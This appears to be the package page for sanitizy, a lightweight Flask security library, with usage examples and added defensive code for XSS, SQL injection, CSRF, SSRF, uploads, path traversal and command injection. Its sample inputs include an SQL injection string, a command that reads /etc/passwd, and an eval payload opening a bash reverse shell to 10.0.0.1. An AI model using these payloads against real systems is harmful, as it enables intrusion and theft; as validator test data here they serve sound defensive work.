Helpful module to secure Flask apps
Sanitizy
This is a simple and very lightweight Python package that helps secure Python web applications in general, and Flask apps in particular, since Flask provides little of this out of the box.
Usage:
XSS:
Escape some value:
from sanitizy import *
XSS.escape('<h1>')  # produces: '&lt;h1&gt;'
Escape all of Flask's GET parameters:
XSS.escape_args(request)  # produces a dict with escaped values
Escape all of Flask's POST parameters:
XSS.escape_form(request)  # produces a dict with escaped values
SQL-Injection:
Escape some value:
from sanitizy import *
SQLI.escape("' or 1=1 or '")  # produces: "\' or 1=1 or \'"
Escape all of Flask's GET parameters:
SQLI.escape_args(request)  # produces a dict with escaped values
Escape all of Flask's POST parameters:
SQLI.escape_form(request)  # produces a dict with escaped values
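Escaping quote characters, as SQLI.escape() does above, only helps when the value is later spliced into SQL text, and backslash escaping is only meaningful to databases that treat `\` as an escape (MySQL does; SQLite does not). The check a practitioner wants next to this section is the parameterised query, where the driver sends the value separately from the statement. The following is an added example, not the sanitizy project's code; it uses Python's built-in sqlite3 with a constructed in-memory table and the same payload shown on this page:

```python
import sqlite3

# Constructed in-memory table so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn

def find_user_vulnerable(conn, name):
    # String formatting splices the input into the SQL text, so a quote in
    # the input changes the structure of the statement.
    query = "SELECT name FROM users WHERE name = '%s'" % name
    return [row[0] for row in conn.execute(query)]

def find_user_parameterized(conn, name):
    # The driver sends the value separately from the statement; the input is
    # only ever compared as data, whatever characters it contains.
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]

# The same payload this page passes to SQLI.escape().
PAYLOAD = "' or 1=1 or '"

def demo(payload=PAYLOAD):
    """Run both lookups with the payload and a legitimate name."""
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, payload),
        "parameterized": find_user_parameterized(conn, payload),
        "legit": find_user_parameterized(conn, "alice"),
    }

if __name__ == "__main__":
    print(demo())
```

The formatted query becomes `WHERE name = '' or 1=1 or ''` and returns every row; the parameterised query looks for a user literally named `' or 1=1 or '` and returns nothing. Use escaping only as a last resort when a query API offers no placeholders.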
CSRF:
Check whether the request comes from the application itself:
CSRF.validate("http://www.google.com", ["www.google.com", "www.bing.com"])  # takes the Referer header value and a list of allowed domains, then returns True if it's safe and False if not
Check whether the request comes from the Flask application itself:
CSRF.validate_flask(request)  # returns True if it's safe and False if not
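The pitfall in a Referer check is comparing strings instead of parsed hostnames: a substring or prefix test accepts `www.example.com.evil.test` or an allowed name placed in the query string. The following is an added example, not sanitizy's implementation; it parses the header with urllib.parse, fails closed when the header is absent, and the allowlist `ALLOWED_HOSTS` and the header dicts are constructed for the example:

```python
from urllib.parse import urlsplit

# Constructed allowlist of hosts this application trusts.
ALLOWED_HOSTS = {"www.example.com", "example.com"}

def referer_allowed(referer, allowed_hosts=ALLOWED_HOSTS):
    """True only if the Referer parses as http(s) and its host is allowlisted.

    The comparison is on the parsed hostname (lowercased, userinfo and port
    removed), so look-alike hosts and allowed names hidden in the path or
    query string do not match.
    """
    if not referer:
        return False                     # header absent or empty: fail closed
    try:
        parts = urlsplit(referer)
    except ValueError:                   # e.g. malformed IPv6 literal
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    return host is not None and host in allowed_hosts

def same_origin_request(headers):
    """validate_flask-style check on a request's headers (a plain dict here):
    the Referer's host must equal the hostname in the Host header."""
    host = urlsplit("//" + headers.get("Host", "")).hostname
    if not host:
        return False
    return referer_allowed(headers.get("Referer"), {host})
```

Browsers may strip or suppress Referer under privacy settings, so a request with no header is rejected here; that makes this check a supplement to a per-session CSRF token rather than a replacement for one.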
SSRF:
Validate whether a URL could lead to SSRF:
SSRF.validate("http://localhost:22")  # returns True if it's safe and False if not
Validate whether a domain/IP could lead to SSRF:
SSRF.validate("localhost:22", url=False)  # returns True if it's safe and False if not
File Upload:
Check whether an uploaded file is safe:
FILE_UPLOAD.check_file(request.files['file'], allowed_extensions=['png','jpg','jpeg','gif','pdf'], allowed_mimetypes=["application/pdf","application/x-pdf","image/png","image/jpg","image/jpeg"])  # returns True if it's safe and False if not
Save files securely:
FILE_UPLOAD.save_file(request.files['file'], path="uploads/")  # returns the path to the saved file
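Two checks matter for uploads: the extension must be on an allowlist, and the file's leading bytes must match that extension, because the client-declared Content-Type and file name are both attacker-controlled. The following is an added example, not sanitizy's implementation; the `MAGIC` table of well-known signatures, the allowlist (the one used in the call above) and the `uploads` directory are constructed for the example, and the storage name is chosen by the server:

```python
import os
import secrets

# Allowlist from this page's check_file() call.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Well-known leading bytes for each allowed extension (constructed table).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

def extension_of(filename):
    """Lowercased extension of the last path component, or None."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any directory part
    if "." not in base:
        return None
    return base.rsplit(".", 1)[1].lower()

def file_is_safe(filename, head, allowed_extensions=ALLOWED_EXTENSIONS):
    """Allowlisted extension AND a content signature that matches it.

    `head` is the first few bytes of the upload. The declared MIME type is
    deliberately not consulted: the client sets it.
    """
    ext = extension_of(filename)
    if ext not in allowed_extensions:
        return False
    return any(head.startswith(sig) for sig in MAGIC.get(ext, ()))

def safe_storage_path(filename, upload_dir="uploads"):
    """Server-chosen name: a random token plus the validated extension, so the
    original name (which may contain path separators) never reaches the disk."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: %r" % (ext,))
    return os.path.join(upload_dir, "%s.%s" % (secrets.token_hex(16), ext))
```

Read `head` from the upload stream and rewind before saving; the signature check is a sanity check on the container format, not a malware scan, so the upload directory should still be served without execute permissions.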
Path Traversal:
Check whether a path is safe to open or download:
PATH_TRAVERSAL.check("../../../../../../etc/passwd")  # returns True if it's safe and False if not
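Looking for `..` in the string is fragile; the robust check resolves the requested path against the directory it must stay inside and compares path segments. The following is an added example, not sanitizy's code; the base directory `/srv/app/uploads` is a constructed value:

```python
import os

def resolve_under(base_dir, user_path):
    """Absolute path for user_path inside base_dir, or None if it escapes."""
    try:
        base = os.path.realpath(base_dir)
        # join() discards base when user_path is absolute; realpath() collapses
        # '..' segments and follows symlinks, so the check is on the real target.
        candidate = os.path.realpath(os.path.join(base, user_path))
        # commonpath() compares whole segments: /srv/app/uploads_evil is not
        # under /srv/app/uploads, which a plain startswith() would accept.
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:
        # embedded NUL byte, or paths on different drives on Windows
        return None
    return candidate if inside else None

def path_is_safe(base_dir, user_path):
    """Same True/False contract as PATH_TRAVERSAL.check() above."""
    return resolve_under(base_dir, user_path) is not None

if __name__ == "__main__":
    base = "/srv/app/uploads"   # constructed base directory
    for p in ["report.pdf", "../../../../../../etc/passwd", "/etc/passwd"]:
        print(p, "->", resolve_under(base, p))
```

Open the file using the returned absolute path rather than the user's string, so the value that was checked is the value that is used.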
RCE (Remote Code/Command Execution):
Check whether a value is safe to pass to a command:
RCE.command("ls -a ;cat /etc/passwd ")  # returns True if it's safe and False if not
Check whether a value is safe to pass to an "eval" function:
RCE.eval("__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")  # returns True if it's safe and False if not
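Rejecting shell metacharacters is a useful second layer, but the primary defence is to never let a shell parse user input at all: pass an argv list to subprocess with shell=False, and for eval replace it with ast.literal_eval, which only evaluates constants and containers. The following is an added example, not sanitizy's implementation; the metacharacter set and the sample arguments are constructed for it:

```python
import ast
import re
import shlex

# Characters that let a shell split, chain, redirect or expand an argument.
SHELL_METACHARS = re.compile(r"""[;&|`$<>(){}\[\]\\*?~!'"#]""")

def command_arg_is_safe(value, max_len=128):
    """Same contract as RCE.command() above: True only for a plain argument."""
    if not value or len(value) > max_len:
        return False
    if any(ord(c) < 32 or ord(c) == 127 for c in value):  # control bytes, newlines
        return False
    return SHELL_METACHARS.search(value) is None

def build_argv(program, fixed_args, user_args):
    """argv for subprocess.run(argv) with shell=False.

    The shell never parses the user's values, '--' ends option parsing for
    programs that honour it (so a value starting with '-' is not read as an
    option), and the metacharacter check is the extra layer.
    """
    for arg in user_args:
        if not command_arg_is_safe(arg):
            raise ValueError("rejected argument: %r" % (arg,))
    return [program, *fixed_args, "--", *user_args]

def command_line_for_log(argv):
    """If a single string is ever needed (audit log), quote each element."""
    return shlex.join(argv)

def parse_literal(value):
    """Replacement for eval() on data: accepts Python literal syntax only,
    returns None for anything else (calls, names, attribute access)."""
    try:
        return ast.literal_eval(value)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        return None
```

Run the result with `subprocess.run(build_argv("ls", ["-la"], [user_value]))`; if the called program does not honour `--`, drop it and reject values starting with `-` instead.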
Validate User Inputs:
Check whether a value contains letters only:
FORM_INPUTS.alphabet("ala bouali", length=(1,50))  # returns True if it's correct and False if not
Check whether a value contains digits only:
FORM_INPUTS.numeric("233 21 4", length=(1,15))  # returns True if it's correct and False if not
Check whether a value is alphanumeric:
FORM_INPUTS.alphanumeric(" ala bOuali12 56", length=(1,50))  # returns True if it's correct and False if not
Check whether a value is an email address:
FORM_INPUTS.email("alabouali@gmail.com", length=(6,15))  # returns True if it's correct and False if not
Check whether a value is a phone number:
FORM_INPUTS.phone_number("+123456789", length=(6,15))  # returns True if it's correct and False if not
Check whether a value is a long enough password:
FORM_INPUTS.password("fvccabah$vhj", length=(8,15))  # returns True if it's correct and False if not
Check whether two passwords match and are long enough:
FORM_INPUTS.passwords_match("fvccabah$vhj", "fvccabah$234", length=(8,15))  # returns True if it's correct and False if not
Check whether a value matches a specific regex:
FORM_INPUTS.regex_match("alabouali@gmail.com", r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b', length=(6,15))  # returns True if it's correct and False if not
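Each of these validators is a length window plus a pattern; the detail that matters is anchoring with re.fullmatch, since re.match only anchors the start and `$` still accepts a trailing newline. The following is an added example, not the FORM_INPUTS implementation; the patterns and the default length windows are assumptions chosen to fit the calls above:

```python
import re

def _matches(value, pattern, length):
    """Inclusive length window plus a whole-string regex match."""
    if not isinstance(value, str):
        return False
    lo, hi = length
    if not lo <= len(value) <= hi:
        return False
    # fullmatch, not match/search: nothing may precede or follow the pattern.
    return re.fullmatch(pattern, value) is not None

def alphabet(value, length=(1, 50)):
    return _matches(value, r"[A-Za-z ]+", length)

def numeric(value, length=(1, 15)):
    return _matches(value, r"[0-9 ]+", length)

def alphanumeric(value, length=(1, 50)):
    return _matches(value, r"[A-Za-z0-9 ]+", length)

# Same shape as the regex_match() pattern on this page, with the TLD class fixed.
EMAIL_RE = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"

def email(value, length=(6, 254)):
    return _matches(value, EMAIL_RE, length)

def phone_number(value, length=(6, 15)):
    return _matches(value, r"\+?[0-9]+", length)

def password(value, length=(8, 64)):
    # Any printable character is allowed; only the length window is enforced.
    return _matches(value, r"[^\x00-\x1f\x7f]+", length)

def passwords_match(first, second, length=(8, 64)):
    return password(first, length) and first == second

def regex_match(value, pattern, length):
    return _matches(value, pattern, length)
```

Note that with the length window (6,15) used in the email call above, a 19-character address such as `alabouali@gmail.com` is rejected on length before the pattern is consulted; pick the window to fit the field (addresses can be up to 254 characters).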
Download files
Source Distribution
sanitizy-1.1.4.tar.gz (4.8 kB)